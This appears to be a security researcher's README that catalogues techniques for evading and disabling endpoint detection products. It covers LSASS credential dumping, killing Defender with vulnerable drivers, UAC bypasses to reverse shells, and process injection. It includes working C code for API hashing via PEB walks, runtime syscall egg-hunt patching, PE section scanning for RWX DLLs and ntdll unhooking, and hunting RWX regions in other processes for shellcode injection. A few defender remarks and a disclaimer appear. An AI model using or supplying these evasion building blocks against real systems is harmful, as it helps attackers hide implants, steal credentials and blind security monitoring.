
C:\Users\Offensive-Panda>whoami

Usman Sikander (a.k.a. Offensive-Panda) is a seasoned security professional passionate about identifying and researching advanced evasion techniques, developing a comprehensive understanding of threat tactics, techniques, and procedures (TTPs) through in-depth analysis of real-world attack scenarios, prominent Advanced Persistent Threat (APT) campaigns, and emerging evasion tactics, and validating security postures through emulation. With a proven track record of developing exploits aligned with MITRE ATT&CK tactics and automating exploit processes, I excel at conducting comprehensive simulations within controlled environments that include all security controls. My primary objective is to identify weaknesses, misconfigurations and vulnerabilities; validate security controls and incident response capabilities; identify areas for improvement; and deliver detailed threat analysis for proactive threat hunting, providing adversary attack paths, indicators of attack (IOAs), indicators of compromise (IOCs), and actionable mitigation strategies to strengthen an organisation's detection engineering capabilities.

Purpose

This collection offers advanced methods for bypassing the defenses of Endpoint Detection and Response (EDR) and Extended Detection and Response (XDR) systems. It is a central repository for cybersecurity enthusiasts, researchers and professionals who want to stay ahead in the field, and a resource for anyone working to improve their skills and their defenses. It covers manipulating system calls, obfuscating code, managing memory to evade detection, and other advanced evasion techniques. By leveraging these methods, practitioners can enhance penetration testing, red teaming and malware analysis, and build more resilient defenses.

Evasion Techniques Heatmap

Direct and Indirect Syscalls
API Hashing
API Imports Obfuscation
Payload Encryption
Egg Hunting
UAC Bypass
COR_PROFILER
Random Instructions and Prototypes
Mockingjay
Forking Technique Memory Dumps
API Unhooking
ETW Patching
PEB Lookup
Disable and Modify Tools
Lagos Island (Reflective Loading)
RWX Memory Block Hunt
BYOVD

Check Out My Articles

BYOVD A Kernel Attack

BYOVD A Kernel Attack: Stealthy Threat to Endpoint Security

Delve into the intricacies of BYOVD attacks, exploring how malicious actors exploit this technique to blind, terminate, and manipulate endpoint detection and response (EDR) solutions. We will dissect the mechanisms used to obtain NT Authority context and remove EDR callbacks, providing practical demonstrations of these attacks.

Arsenal 2.0

Arsenal 2.0: Elevating Malware Stealth Tactics to Bypass Static Detection

Dives into advanced techniques that let malware evade static detection by EDR/XDR solutions. This post extends the earlier "Arsenal: Bypass EDR’s/XDR’s and make malware analysis harder".

PEB Walk

PEB Walk: Avoid API function calls inspection in IAT by analyst and also bypass static detection of AV/EDR

Techniques to evade the static detection methods used by AV/EDR solutions. Arsenal preparation is divided into four main stages, which include hiding strings, obfuscating API imports, and resolving APIs in different ways, for example dynamically at runtime.

Arsenal

Arsenal: Bypass EDR’s/XDR’s and make malware analysis harder

An exploration of multiple techniques to bypass modern AV/EDR/XDR security solutions. As a red teamer and security guy, I always try to explore new methods and approaches to bypass security controls.

On-Disk Detection

On-Disk Detection: Bypass AV’s/EDR’s using syscalls with legacy instruction, series of instructions and random nop instructions

Techniques to bypass both static and dynamic detection by AV/EDR products. The main focus is bypassing on-disk detection of a binary that uses direct syscalls.

EASE POST-EXPLOITATION

EASE POST-EXPLOITATION: Getting elevated reverse shell using DLL Hijacking and Mock Directories

A DLL hijacking and mock-directory technique to bypass the Windows UAC security feature and obtain a high-privilege reverse shell.

AV/EDR Evasion Using Direct System Calls

AV/EDR Evasion Using Direct System Calls (User-Mode vs Kernel-Mode)

Hooking is a method used by AV/EDRs to intercept a function call (in user mode, typically the Nt* stubs in ntdll.dll) and redirect control flow into their own code, where they analyze the call and decide whether or not it is malicious.

Bypass Mimikatz

Bypass “Mimikatz” using the Process Injection Technique

Getting Mimikatz past AV/EDR using process injection. Most EDR/AV products identify Mimikatz by signature and remove it; there are many ways to bypass that.


Code Implementation

D3MPSEC

D3MPSEC

"D3MPSEC" is a memory dumping tool designed to extract a memory dump of the LSASS process using various techniques, including direct system calls, randomized procedures, and prototype name obfuscation.

Dirty Vanity

Dirty Vanity (DV_NEW)

A combination of multiple evasion techniques. It uses direct syscalls to bypass user-mode EDR hooking, and to avoid static detection of the syscall instruction in the stub it uses an egg-hunt technique.

Honeypots

Honeypots for Threat Intelligence

Runs as a service, monitors all Sysmon event logs, and takes action based on the events generated by the attacker's activity. Uploads all dropped and created malware and files to a server for further analysis, and captures all commands executed by the attacker on the system.

Persistence

Persistence and Anti-Sandbox

This repository contains C# code that uses a recent persistence technique and multiple anti-VM and anti-sandbox techniques. The program uses four anti-VM/anti-sandbox checks, and persists through PowerShell and the Task Scheduler.

Static Analysis

Bypass Malware Static Analysis

Direct syscall injection to bypass AV/EDR. The main purpose of this repository is to understand static detection and how to bypass it. When I was using direct syscalls in my implant, after compiling the code MDE (Microsoft Defender for Endpoint) was detecting the binary in static analysis.

DLL Hijacking

C2 Elevated Shell via DLL Hijacking

A DLL hijacking and mock-directory technique to bypass the Windows UAC security feature and obtain a high-privilege reverse shell. Security researchers identified this technique, which uses a simplified form of DLL hijacking together with mock folders to bypass UAC.

RWX Memory

RWX Memory Hunt and Injection

Abuses the Windows fork API and the OneDrive.exe process to inject shellcode without allocating a new RWX memory region. The technique finds an existing RWX region in an already running process (here OneDrive.exe), writes the shellcode into that region, and executes it without calling VirtualAlloc, VirtualAllocEx or VirtualProtect.

WPM Magic

WPM Magic and Injection

Uses the AddressOfEntryPoint of a target process, which is mapped RX, and relies on the internal behaviour of WriteProcessMemory (it changes the page protection itself, via NtProtectVirtualMemory, writes, and restores it) to place the shellcode there. The exploit also uses direct syscalls to bypass user-mode hooking by AV/EDRs, and avoids calling VirtualAlloc and VirtualProtect directly. Note that the protection change still happens; it is hidden from user-mode hooks on VirtualProtect, not from kernel-side telemetry.

PEB Walk

PEB Walk and API Obfuscation

This exploit uses the PEB walk technique to resolve API calls dynamically and obfuscates all API calls used to perform process injection. These techniques help bypass static analysis by AV/EDR solutions. The PEB walk is used to resolve the addresses of LoadLibraryA and GetProcAddress.

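
A PEB walk with API hashing, as an added example; this is not the PEB Walk repository's code. It assumes the x64 layouts of PEB, PEB_LDR_DATA and LDR_DATA_TABLE_ENTRY stated in the comments, uses djb2 as an arbitrary hash (any hash works; the point is that the export and module names never appear in the binary), and on Windows cross-checks its result against GetProcAddress. The hash helpers and the constructed module name run anywhere; the walk itself needs x64 Windows.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

/* djb2 over the export-name bytes; the same hash is used for the (uppercased) module name so
 * that hash_utf16_upper(L"kernel32.dll") == hash_ascii("KERNEL32.DLL"). */
uint32_t hash_ascii(const char *s) {
    uint32_t h = 5381;
    while (*s) h = h * 33 + (uint8_t)*s++;
    return h;
}

/* BaseDllName in the PEB is UTF-16 and mixed case; fold a-z to A-Z before hashing. */
uint32_t hash_utf16_upper(const uint16_t *s, size_t n) {
    uint32_t h = 5381;
    for (size_t i = 0; i < n; i++) {
        uint32_t c = s[i];
        if (c >= 'a' && c <= 'z') c -= 'a' - 'A';
        h = h * 33 + c;
    }
    return h;
}

/* Constructed UTF-16 module name, standing in for what LDR_DATA_TABLE_ENTRY.BaseDllName holds. */
uint32_t sample_module_hash(void) {
    static const uint16_t name[] = { 'k','e','r','n','e','l','3','2','.','d','l','l' };
    return hash_utf16_upper(name, sizeof name / sizeof name[0]);
}

#if defined(_WIN32) && (defined(_M_X64) || defined(__x86_64__))
#include <windows.h>
#include <intrin.h>
/* Minimal x64 layouts (assumed offsets: PEB.Ldr = 0x18, PEB_LDR_DATA.InLoadOrderModuleList = 0x10,
 * LDR_DATA_TABLE_ENTRY.DllBase = 0x30, .BaseDllName = 0x58). Only the fields we touch are named. */
typedef struct { uint16_t Length, MaximumLength; uint16_t *Buffer; } USTR;
typedef struct {
    LIST_ENTRY InLoadOrderLinks, InMemoryOrderLinks, InInitializationOrderLinks;
    void *DllBase, *EntryPoint; uint32_t SizeOfImage; USTR FullDllName, BaseDllName;
} LDR_ENTRY;
typedef struct { uint8_t Reserved[0x10]; LIST_ENTRY InLoadOrderModuleList; } LDR_DATA;
typedef struct { uint8_t Reserved[0x18]; LDR_DATA *Ldr; } PEB_MIN;

/* Walk PEB->Ldr->InLoadOrderModuleList without calling GetModuleHandle. */
void *peb_find_module(uint32_t name_hash) {
    PEB_MIN *peb = (PEB_MIN *)__readgsqword(0x60);
    LIST_ENTRY *head = &peb->Ldr->InLoadOrderModuleList;
    for (LIST_ENTRY *e = head->Flink; e != head; e = e->Flink) {
        LDR_ENTRY *m = (LDR_ENTRY *)e;            /* InLoadOrderLinks is the first field */
        if (hash_utf16_upper(m->BaseDllName.Buffer, m->BaseDllName.Length / 2) == name_hash)
            return m->DllBase;
    }
    return NULL;
}

/* Walk the export directory of a loaded image without calling GetProcAddress.
 * Forwarded exports (RVA pointing back inside the export directory) are not followed. */
void *pe_find_export(void *base, uint32_t fn_hash) {
    uint8_t *b = (uint8_t *)base;
    IMAGE_NT_HEADERS *nt = (IMAGE_NT_HEADERS *)(b + ((IMAGE_DOS_HEADER *)b)->e_lfanew);
    IMAGE_DATA_DIRECTORY d = nt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT];
    if (d.VirtualAddress == 0) return NULL;
    IMAGE_EXPORT_DIRECTORY *ed = (IMAGE_EXPORT_DIRECTORY *)(b + d.VirtualAddress);
    uint32_t *names = (uint32_t *)(b + ed->AddressOfNames);
    uint16_t *ords  = (uint16_t *)(b + ed->AddressOfNameOrdinals);
    uint32_t *funcs = (uint32_t *)(b + ed->AddressOfFunctions);
    for (uint32_t i = 0; i < ed->NumberOfNames; i++)
        if (hash_ascii((const char *)(b + names[i])) == fn_hash)
            return b + funcs[ords[i]];
    return NULL;
}
#endif

int main(void) {
    /* Only the hashes need to ship in a real implant; here the strings are hashed at runtime
     * purely so the example is self-contained. */
    uint32_t h_k32 = hash_ascii("KERNEL32.DLL");
    uint32_t h_ll  = hash_ascii("LoadLibraryA");
    uint32_t h_gpa = hash_ascii("GetProcAddress");
    printf("hashes: kernel32=%08X LoadLibraryA=%08X GetProcAddress=%08X\n", h_k32, h_ll, h_gpa);
#if defined(_WIN32) && (defined(_M_X64) || defined(__x86_64__))
    void *k32 = peb_find_module(h_k32);
    if (k32) {
        void *ll  = pe_find_export(k32, h_ll);
        void *gpa = pe_find_export(k32, h_gpa);
        /* Cross-check against the documented API: both must agree or the walk is wrong. */
        printf("LoadLibraryA   %p (API says %p)\n", ll,  (void *)GetProcAddress((HMODULE)k32, "LoadLibraryA"));
        printf("GetProcAddress %p (API says %p)\n", gpa, (void *)GetProcAddress((HMODULE)k32, "GetProcAddress"));
    }
#endif
    return 0;
}
```

Because the binary imports nothing from kernel32 for these two calls, the IAT gives an analyst no hint about them; the trade-off is that the hash constants themselves become a signature once a hash algorithm and its values for common exports are known, which is why implementations rotate the hash or salt it per build.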
.NET Profiler

.NET Profiler DLL Loading UAC Bypass

.NET profiler DLL loading can be abused to make a legitimate .NET application load an attacker-controlled DLL via environment variables. This exploit loads such a DLL into Task Scheduler (MMC) to bypass UAC and obtain admin privileges.

BYOVD

BYOVD for Privilege Escalation

This exploit rebuilds and exploits CVE-2019-16098 in the Micro-Star MSI Afterburner 4.6.2.15658 driver (RTCore64.sys and RTCore32.sys), which allows any authenticated user to read and write arbitrary memory, I/O ports, and MSRs. Instead of a hardcoded base address of ntoskrnl.exe.


Demonstration

Dirty Vanity Implementation Using Direct Syscalls

Dirty Vanity Implementation Using Direct Syscalls

A combination of multiple evasion techniques. It uses direct syscalls to bypass user-mode EDR hooking, and to avoid static detection of the syscall instruction in the stub it uses an egg-hunt technique: the egg hunt places placeholder bytes (emitted with a DB directive) in the syscall stub where the syscall instruction would be, and patches in the real instruction at runtime.

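
The runtime half of the egg hunt, as an added example that is not the Dirty Vanity repository's code. The 8-byte egg value and the nop padding are assumptions (the author's real marker is not on this page); the stub bytes are constructed. On disk the stub carries the egg instead of `syscall ; ret`, so no 0F 05 sequence exists for a static scanner; at start-up the code scans itself, swaps the egg for the real instructions and only then issues syscalls.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>
#ifdef _WIN32
#include <windows.h>
#endif

/* Assumed egg: in assembly the stub would carry `db 11h,22h,33h,44h,55h,66h,77h,88h`
 * in place of `syscall ; ret`. REAL is what it becomes at runtime. */
static const uint8_t EGG[8]  = { 0x11, 0x22, 0x33, 0x44, 0x55, 0x66, 0x77, 0x88 };
static const uint8_t REAL[8] = { 0x0F, 0x05, 0xC3, 0x90, 0x90, 0x90, 0x90, 0x90 }; /* syscall ; ret ; nop x5 */

/* Scan `len` bytes of code for every occurrence of the egg and overwrite it with the real
 * instructions. Returns the number of stubs patched. On Windows the caller must first make the
 * range writable (make_writable below); a test buffer on the stack already is. */
int egg_hunt_patch(uint8_t *code, size_t len) {
    int patched = 0;
    for (size_t i = 0; i + sizeof EGG <= len; ) {
        if (memcmp(code + i, EGG, sizeof EGG) == 0) {
            memcpy(code + i, REAL, sizeof REAL);
            patched++;
            i += sizeof EGG;
        } else {
            i++;
        }
    }
    return patched;
}

#ifdef _WIN32
/* Flip a code range to RWX for patching; returns the old protection (0 on failure).
 * This VirtualProtect call is itself something EDRs watch for on executable pages. */
DWORD make_writable(void *p, size_t len) {
    DWORD old = 0;
    return VirtualProtect(p, len, PAGE_EXECUTE_READWRITE, &old) ? old : 0;
}
#endif

/* Constructed sample: two stubs of `mov r10,rcx ; mov eax,SSN ; <egg> ; ret`. */
size_t build_egg_stubs(uint8_t *buf, size_t cap) {
    static const uint8_t prologue[] = { 0x4C, 0x8B, 0xD1, 0xB8, 0x18, 0x00, 0x00, 0x00 };
    size_t n = 0;
    if (cap < 2 * (sizeof prologue + sizeof EGG + 1)) return 0;
    for (int s = 0; s < 2; s++) {
        memcpy(buf + n, prologue, sizeof prologue);
        buf[n + 4] = (uint8_t)(0x18 + s);          /* SSN differs per stub */
        n += sizeof prologue;
        memcpy(buf + n, EGG, sizeof EGG); n += sizeof EGG;
        buf[n++] = 0xC3;
    }
    return n;
}

/* Number of stubs the hunt patches in the sample (expected: 2). */
int sample_patch_count(void) {
    uint8_t buf[64];
    return egg_hunt_patch(buf, build_egg_stubs(buf, sizeof buf));
}
/* 1 when the first stub's egg really became `syscall ; ret` (0F 05 C3). */
int sample_first_stub_is_syscall(void) {
    uint8_t buf[64];
    egg_hunt_patch(buf, build_egg_stubs(buf, sizeof buf));
    return buf[8] == 0x0F && buf[9] == 0x05 && buf[10] == 0xC3;
}
/* Bytes without an egg must be left alone. */
int sample_no_egg(void) {
    uint8_t buf[16] = { 0x4C, 0x8B, 0xD1, 0xB8 };
    return egg_hunt_patch(buf, sizeof buf);
}

int main(void) {
    printf("patched %d stub(s); first stub is now %s\n", sample_patch_count(),
           sample_first_stub_is_syscall() ? "syscall ; ret" : "UNCHANGED");
    return 0;
}
```

Two caveats follow directly from the code: the egg is a constant, so once it is known it is as good a static signature as 0F 05 was, and the patch requires the stub's page to be writable, which means a VirtualProtect (or NtProtectVirtualMemory) on executable memory at start-up that behavioural detection can key on.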
Mockingjay Technique to Avoid RWX Region Detection

Mockingjay Technique to Avoid RWX Region Detection

Uses DLLs that ship with a section already marked RWX, so shellcode can be written and executed there without allocating or re-protecting memory. This sidesteps security mechanisms that monitor or restrict RWX memory allocations.

Combining Unhooking and ETW Patching to Dump LSASS Memory

Combining Unhooking and ETW Patching to Dump LSASS Memory

Explores advanced defense-evasion techniques for dumping lsass.exe process memory: unhooking is combined with ETW (Event Tracing for Windows) patching to dump LSASS (Local Security Authority Subsystem Service) memory.

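
Section-table parsing serves both of the entries above: the Mockingjay search for a DLL whose section headers already request RWX, and the unhooking step, which has to know where .text lives in a fresh on-disk copy of ntdll before it can copy clean bytes over the hooked ones. This is an added example, not code from either demonstration. The sample PE image is constructed in build_sample_pe (empty optional header, two sections) and is not a real DLL; a real file can be passed on the command line.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define SCN_EXECUTE 0x20000000u
#define SCN_READ    0x40000000u
#define SCN_WRITE   0x80000000u

typedef struct {
    char name[9];
    uint32_t virtual_address, virtual_size, raw_offset, raw_size, characteristics;
} section_info;

static uint16_t rd16(const uint8_t *p) { return (uint16_t)(p[0] | (p[1] << 8)); }
static uint32_t rd32(const uint8_t *p) {
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) | ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Parse the section table of a PE file image (bounds-checked). Returns the number of sections
 * copied into `out`, or -1 if the buffer is not a PE or the table runs past the end. */
int pe_sections(const uint8_t *img, size_t len, section_info *out, int max_out) {
    if (len < 0x40 || img[0] != 'M' || img[1] != 'Z') return -1;
    uint32_t pe = rd32(img + 0x3C);                              /* e_lfanew */
    if ((size_t)pe + 24 > len || memcmp(img + pe, "PE\0\0", 4) != 0) return -1;
    int nsec = rd16(img + pe + 6);                               /* FileHeader.NumberOfSections */
    size_t table = (size_t)pe + 24 + rd16(img + pe + 20);        /* skip SizeOfOptionalHeader */
    if (nsec > max_out || table + (size_t)nsec * 40 > len) return -1;
    for (int i = 0; i < nsec; i++) {
        const uint8_t *h = img + table + (size_t)i * 40;
        memcpy(out[i].name, h, 8); out[i].name[8] = '\0';
        out[i].virtual_size    = rd32(h + 8);
        out[i].virtual_address = rd32(h + 12);
        out[i].raw_size        = rd32(h + 16);
        out[i].raw_offset      = rd32(h + 20);
        out[i].characteristics = rd32(h + 36);
    }
    return nsec;
}

/* Mockingjay candidate: the loader maps this section RWX, so no VirtualProtect call is needed. */
int section_is_rwx(const section_info *s) {
    uint32_t rwx = SCN_EXECUTE | SCN_READ | SCN_WRITE;
    return (s->characteristics & rwx) == rwx;
}
int count_rwx(const section_info *s, int n) {
    int c = 0;
    for (int i = 0; i < n; i++) c += section_is_rwx(&s[i]);
    return c;
}
/* Unhooking needs the clean .text of the on-disk ntdll: find it by name to know which bytes to copy. */
const section_info *find_section(const section_info *s, int n, const char *name) {
    for (int i = 0; i < n; i++) if (strcmp(s[i].name, name) == 0) return &s[i];
    return NULL;
}

/* Constructed sample image (not a real DLL): DOS stub, PE signature, file header with an empty
 * optional header (a real PE32+ has 0xF0 bytes there), then an RX .text and an RWX .rwx section. */
static void wr16(uint8_t *p, uint16_t v) { p[0] = (uint8_t)v; p[1] = (uint8_t)(v >> 8); }
static void wr32(uint8_t *p, uint32_t v) { for (int i = 0; i < 4; i++) p[i] = (uint8_t)(v >> (8 * i)); }
static void put_section(uint8_t *h, const char *name, uint32_t va, uint32_t size, uint32_t raw, uint32_t ch) {
    memset(h, 0, 40); memcpy(h, name, strlen(name));
    wr32(h + 8, size); wr32(h + 12, va); wr32(h + 16, size); wr32(h + 20, raw); wr32(h + 36, ch);
}
size_t build_sample_pe(uint8_t *buf, size_t cap) {
    const size_t total = 0x40 + 24 + 2 * 40;
    if (cap < total) return 0;
    memset(buf, 0, total);
    buf[0] = 'M'; buf[1] = 'Z';
    wr32(buf + 0x3C, 0x40);                                        /* e_lfanew -> "PE\0\0" */
    memcpy(buf + 0x40, "PE\0\0", 4);
    wr16(buf + 0x44, 0x8664);                                      /* Machine = AMD64 */
    wr16(buf + 0x46, 2);                                           /* NumberOfSections */
    put_section(buf + 0x58, ".text", 0x1000, 0x200,  0x400, 0x60000020);   /* CODE|EXECUTE|READ       */
    put_section(buf + 0x80, ".rwx",  0x2000, 0x1000, 0x600, 0xE0000040);   /* DATA|EXECUTE|READ|WRITE */
    return total;
}
int sample_rwx_count(void) {
    uint8_t img[256]; section_info s[8];
    int n = pe_sections(img, build_sample_pe(img, sizeof img), s, 8);
    return n < 0 ? -1 : count_rwx(s, n);
}
uint32_t sample_text_rva(void) {
    uint8_t img[256]; section_info s[8];
    int n = pe_sections(img, build_sample_pe(img, sizeof img), s, 8);
    const section_info *t = n < 0 ? NULL : find_section(s, n, ".text");
    return t ? t->virtual_address : 0;
}

/* `pe_scan C:\Windows\System32\ntdll.dll` lists sections and flags RWX ones; no argument = sample. */
int main(int argc, char **argv) {
    uint8_t sample[256], *img = sample; size_t len; section_info s[96];
    if (argc > 1) {
        FILE *f = fopen(argv[1], "rb"); if (!f) { perror(argv[1]); return 1; }
        img = malloc(1 << 20); if (!img) { fclose(f); return 1; }
        len = fread(img, 1, 1 << 20, f); fclose(f);                /* headers sit in the first MiB */
    } else len = build_sample_pe(sample, sizeof sample);
    int n = pe_sections(img, len, s, 96);
    if (n < 0) { fprintf(stderr, "not a parsable PE\n"); return 1; }
    for (int i = 0; i < n; i++)
        printf("%-8s rva=%08X size=%08X chars=%08X%s\n", s[i].name, s[i].virtual_address,
               s[i].virtual_size, s[i].characteristics, section_is_rwx(&s[i]) ? "  <-- RWX" : "");
    if (img != sample) free(img);
    return 0;
}
```

Run over every DLL in a directory, count_rwx is the Mockingjay candidate finder; run over ntdll.dll, find_section(".text") gives the RVA and raw offset of the bytes an unhooker copies back over the loaded image. A defender can use the same parser in reverse: a process that loads a DLL with an RWX section, or whose loaded ntdll .text differs from the on-disk one, is worth a closer look.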
Direct syscalls to dump LSASS.exe memory and offline dumping

Direct Syscalls to Dump LSASS.exe Memory and Offline Dumping

Dumping LSASS memory using direct syscalls to bypass EDR detection and the hooks placed on the traditional APIs.

Remote Template Injection

Remote Template Injection

An exploration of remote template injection to achieve initial access, building a full attack chain around it. Remote template injection still works on Windows and has been used in many APT campaigns.

Mark-of-the-Web for Red Team

Mark-of-the-Web for Red Team

Bypassing Mark-of-the-Web related security features in red team engagements. For macros in files obtained from the internet, users can no longer enable content with a click of a button; a message bar appears instead, with a button to learn more.

Memory dump using Outflank Dumpert and Windows process injection

Memory Dump Using Outflank Dumpert and Windows Process Injection

Utilizes the Outflank Dumpert tool to dump lsass.exe memory and combines it with process injection techniques.

NT-Authority Shell using Fodhelper

NT-Authority Shell using Fodhelper

How to exploit Fodhelper to gain NT-Authority level access on compromised systems.

RWX-Memory Hunt and Injection with CreateRemoteThread

RWX-Memory Hunt and Injection with CreateRemoteThread

Identifying existing RWX (Read-Write-Execute) memory regions in a target process and using them for code injection, with CreateRemoteThread executing the injected code inside that process.

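
The region walk behind both RWX-memory entries on this page (the "RWX Memory Hunt and Injection" repository and this demonstration), as an added example that is not the author's code. The region records in the sample are constructed; on Windows, hunt_rwx walks the address space of a PID given on the command line with VirtualQueryEx. The constants are the winnt.h values, defined locally so the selection logic also compiles and runs off Windows.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>
#ifdef _WIN32
#include <windows.h>
#else
/* Values from winnt.h so region_usable() compiles and runs off Windows too. */
#define MEM_COMMIT              0x1000
#define MEM_PRIVATE             0x20000
#define PAGE_EXECUTE_READWRITE  0x40
#define PAGE_GUARD              0x100
#endif

/* One VirtualQueryEx result, reduced to the fields the hunt needs. */
typedef struct { uint64_t base, size; uint32_t state, protect, type; } region_t;

/* Usable when committed, exactly RWX (PAGE_GUARD or other modifiers would fault on first touch),
 * and large enough for the payload. MEM_IMAGE regions are allowed on purpose: a mapped module
 * with an RWX section is exactly what the OneDrive.exe case above offers. */
int region_usable(const region_t *r, size_t payload_len) {
    if (r->state != MEM_COMMIT) return 0;
    if (r->protect != PAGE_EXECUTE_READWRITE) return 0;
    return r->size >= payload_len;
}

/* Index of the first usable region, or -1 when the target has none (the technique then fails
 * instead of falling back to VirtualAllocEx, which would defeat its purpose). */
int pick_region(const region_t *rs, int n, size_t payload_len) {
    for (int i = 0; i < n; i++) if (region_usable(&rs[i], payload_len)) return i;
    return -1;
}

/* Constructed sample (not captured from a live process): the mix a walk typically yields. */
int sample_pick(size_t payload_len) {
    const region_t rs[] = {
        { 0x7FF600000000ull,     0x1000, MEM_COMMIT, 0x02 /* PAGE_READONLY */,     0x1000000 /* MEM_IMAGE */ },
        { 0x7FF600001000ull,     0x8000, MEM_COMMIT, 0x20 /* PAGE_EXECUTE_READ */, 0x1000000 },
        { 0x000001D000000000ull, 0x1000, MEM_COMMIT, PAGE_EXECUTE_READWRITE | PAGE_GUARD, MEM_PRIVATE },
        { 0x000001D000010000ull, 0x3000, MEM_COMMIT, PAGE_EXECUTE_READWRITE,              MEM_PRIVATE },
        { 0x000001D000020000ull, 0x1000, 0x2000 /* MEM_RESERVE */, 0,                     MEM_PRIVATE },
    };
    return pick_region(rs, 5, payload_len);
}

#ifdef _WIN32
/* Live walk: enumerate the target's address space and collect every usable RWX region.
 * Returns the number stored in `out`, or -1 if the process could not be opened. */
int hunt_rwx(DWORD pid, region_t *out, int max_out) {
    HANDLE h = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, pid);
    if (!h) return -1;
    MEMORY_BASIC_INFORMATION mbi; uint8_t *addr = NULL; int n = 0;
    while (n < max_out && VirtualQueryEx(h, addr, &mbi, sizeof mbi) == sizeof mbi) {
        region_t r = { (uint64_t)(uintptr_t)mbi.BaseAddress, mbi.RegionSize, mbi.State, mbi.Protect, mbi.Type };
        if (region_usable(&r, 1)) out[n++] = r;
        addr = (uint8_t *)mbi.BaseAddress + mbi.RegionSize;
    }
    CloseHandle(h);
    return n;
}
#endif

int main(int argc, char **argv) {
#ifdef _WIN32
    if (argc > 1) {
        region_t found[64];
        int n = hunt_rwx((DWORD)atoi(argv[1]), found, 64);
        if (n < 0) { fprintf(stderr, "could not open pid %s\n", argv[1]); return 1; }
        for (int i = 0; i < n; i++)
            printf("RWX region %016llX size %llX (%s)\n", (unsigned long long)found[i].base,
                   (unsigned long long)found[i].size, found[i].type == MEM_PRIVATE ? "private" : "image/mapped");
        return 0;
    }
#else
    (void)argc; (void)argv;
#endif
    printf("sample: 0x200-byte payload -> region %d, 0x4000-byte payload -> region %d\n",
           sample_pick(0x200), sample_pick(0x4000));
    return 0;
}
```

The same walk is a cheap hunting query for defenders: private, committed RWX regions in a process that has no JIT are rare, and a process like OneDrive.exe carrying one is exactly what this injection technique relies on.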
Terminator

EDR Terminator (Call It Killer)

Attack and kill the guards so that you can do the rest of your work easily: terminating Windows Defender using the BYOVD technique. A technique designed to disable or bypass Endpoint Detection and Response (EDR) systems, typically by targeting and manipulating EDR processes or services to evade detection.

Lagos Island

LSASS.exe Memory Dumping Using Multiple Techniques

Lsass.exe memory dumping using a combination of three techniques: the Lagos Island method (a.k.a. reflective loading), Windows process injection via ConsoleWindowClass, and Windows forking.

.NET Profiler

UAC Bypass Using .NET Profiler DLL Loading Vulnerability

.NET profiler DLL loading can be abused to make a legitimate .NET application load an attacker-controlled DLL via environment variables. This exploit loads such a DLL into Task Scheduler (MMC) to bypass UAC and obtain admin privileges.

EDR Callbacks

Remove EDR Callbacks Using Vulnerable Driver

Explores the use of a vulnerable driver to disable EDR callbacks: the BYOVD technique is used to remove Microsoft Defender's PsSetCreateProcessNotifyRoutine callback routine. EDRs register different callback routines to monitor activity and send telemetry for further analysis.

PE BYOVD

Privilege Escalation Using Vulnerable Driver

A guide to exploiting driver vulnerabilities to escalate privileges on compromised systems. The Micro-Star MSI Afterburner 4.6.2.15658 driver (RTCore64.sys and RTCore32.sys) allows any authenticated user to read and write arbitrary memory, I/O ports, and MSRs.



Disclaimer

The content, techniques, and tools provided in this repository are intended solely for educational and research purposes within the cybersecurity community. I explicitly disclaim any responsibility for the misuse or unlawful use of the provided materials. Any actions taken based on the information are done so at the user's own risk.